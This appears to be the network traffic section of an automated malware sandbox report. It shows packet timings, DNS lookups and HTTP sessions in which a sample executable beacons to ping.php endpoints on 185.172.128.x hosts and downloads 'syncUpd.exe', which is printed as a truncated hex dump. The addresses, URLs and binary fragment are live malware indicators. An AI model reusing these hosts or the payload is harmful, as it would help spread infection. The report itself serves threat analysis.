                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317455053 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317503929 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317518950 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.317549944 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.318283081 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.318336964 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.318809032 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.318859100 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.318937063 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.318995953 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.319787025 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.319845915 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.319885969 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.319941044 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.320678949 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.320719957 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.320796967 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.320828915 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321094036 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321142912 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321171045 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321223021 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321249962 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321296930 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321312904 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321346045 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321371078 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321417093 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321433067 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.321463108 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.363411903 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366733074 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366774082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366811991 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366817951 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366885900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366931915 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.366983891 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367057085 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367094994 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367142916 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367217064 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367254972 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367260933 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367294073 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367333889 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367341042 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367371082 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367408037 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367413998 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367446899 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367485046 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367494106 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367522955 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367561102 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367566109 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367623091 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367660999 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367676973 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367714882 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367752075 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367754936 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367789984 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367826939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367827892 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367866039 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367902040 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367908001 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367945910 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.367990971 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368000984 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368037939 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368077040 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368077993 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368139982 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368179083 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368184090 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368216991 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368254900 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368259907 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368294001 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368335962 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368886948 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368926048 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368963003 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.368963957 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369003057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369040966 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369044065 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369081020 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369117975 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369118929 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369158030 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369191885 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369194984 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369232893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369270086 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369277954 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369308949 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.369352102 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.410675049 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.410716057 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.410764933 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.488936901 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.488981962 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.489008904 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.489042044 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.489690065 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.489748955 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.489784002 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.489895105 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.490397930 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.490437031 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.490463018 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.490494967 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.491271019 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.491311073 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.491348982 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.491349936 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.492312908 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.492372036 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.492976904 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493017912 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493041039 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493066072 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493113995 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493161917 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493191957 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493210077 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493242979 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493279934 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493304014 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493335962 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493360043 CEST8049733185.172.128.76192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.493415117 CEST4973380192.168.2.4185.172.128.76
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.511226892 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.511266947 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.511343002 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.511390924 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.559405088 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.559501886 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.562879086 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.562918901 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.562956095 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.562979937 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.562994003 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.563030958 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.563046932 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.563069105 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.563122034 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564007044 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564044952 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564094067 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564419031 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564457893 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564508915 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564517975 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564558029 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564610004 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564634085 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564721107 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564759970 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564790964 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564796925 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564836025 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564840078 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564877987 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564914942 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564923048 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.564951897 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565000057 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565006971 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565046072 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565093994 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565337896 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565473080 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565521955 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565525055 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565615892 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565666914 CEST4973480192.168.2.4176.97.76.106
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565676928 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:21.565779924 CEST8049734176.97.76.106192.168.2.4
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:13.794044971 CEST192.168.2.41.1.1.10xfe06Standard query (0)note.padd.cn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:14.886693954 CEST192.168.2.41.1.1.10xfe06Standard query (0)note.padd.cn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:01.167732000 CEST192.168.2.41.1.1.10xbb41Standard query (0)svc.iolo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:02.014003038 CEST192.168.2.41.1.1.10xe9a2Standard query (0)download.iolo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:36.920311928 CEST192.168.2.41.1.1.10x76c8Standard query (0)westus2-2.in.applicationinsights.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:15.574671984 CEST1.1.1.1192.168.2.40xfe06No error (0)note.padd.cn.com176.97.76.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:15.574724913 CEST1.1.1.1192.168.2.40xfe06No error (0)note.padd.cn.com176.97.76.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:31.685834885 CEST1.1.1.1192.168.2.40xcbe3No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:31.685834885 CEST1.1.1.1192.168.2.40xcbe3No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:01.276547909 CEST1.1.1.1192.168.2.40xbb41No error (0)svc.iolo.com20.157.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:02.113970041 CEST1.1.1.1192.168.2.40xe9a2No error (0)download.iolo.netiolo0.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:02.113970041 CEST1.1.1.1192.168.2.40xe9a2No error (0)iolo0.b-cdn.net185.93.1.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:37.028503895 CEST1.1.1.1192.168.2.40x76c8No error (0)westus2-2.in.applicationinsights.azure.comwestus2-2.in.ai.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:37.028503895 CEST1.1.1.1192.168.2.40x76c8No error (0)westus2-2.in.ai.monitor.azure.comwestus2-2.in.ai.privatelink.monitor.azure.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:37.028503895 CEST1.1.1.1192.168.2.40x76c8No error (0)westus2-2.in.ai.privatelink.monitor.azure.comgig-ai-prod-westus2-0.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.449730185.172.128.90807436C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:08.487333059 CEST204OUTGET /cpa/ping.php?substr=two&s=ab&sub=0 HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.90
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:10.140281916 CEST148INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:08 GMT
                                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Data Raw: 30
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.449731185.172.128.228807436C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.276288033 CEST190OUTGET /ping.php?substr=two HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.228
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.737292051 CEST190OUTGET /ping.php?substr=two HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.228
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:11.909671068 CEST147INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:11 GMT
                                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    2192.168.2.449732185.172.128.59807436C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.137057066 CEST181OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.59
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307903051 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:12 GMT
                                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                    Last-Modified: Fri, 26 Apr 2024 23:30:02 GMT
                                                                                                                                                                                                                                    ETag: "47e00-617084867e629"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Content-Length: 294400
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 34 51 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 02 41 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 80 e4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ku[Ku[Ku[F'e[Uu[F'Z[u[F'[[du[B)[Hu[Ku[;u[_[Ju[F'a[Ju[d[Ju[RichKu[PEL4Qd<A0@(h`T28@0.text `.rdatal0n@@.dataHLr@.rsrchj@@.relocT`h@B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:12.307943106 CEST1289INData Raw: 41 00 e8 5f 27 00 00 59 c3 b9 74 db 01 04 e8 c8 02 00 00 68 7f 28 41 00 e8 49 27 00 00 59 c3 b9 60 db 01 04 e8 1f 03 00 00 68 75 28 41 00 e8 33 27 00 00 59 c3 6a 00 b9 68 db 01 04 e8 15 01 00 00 c3 6a 00 b9 5c db 01 04 e8 08 01 00 00 c3 6a 00 b9
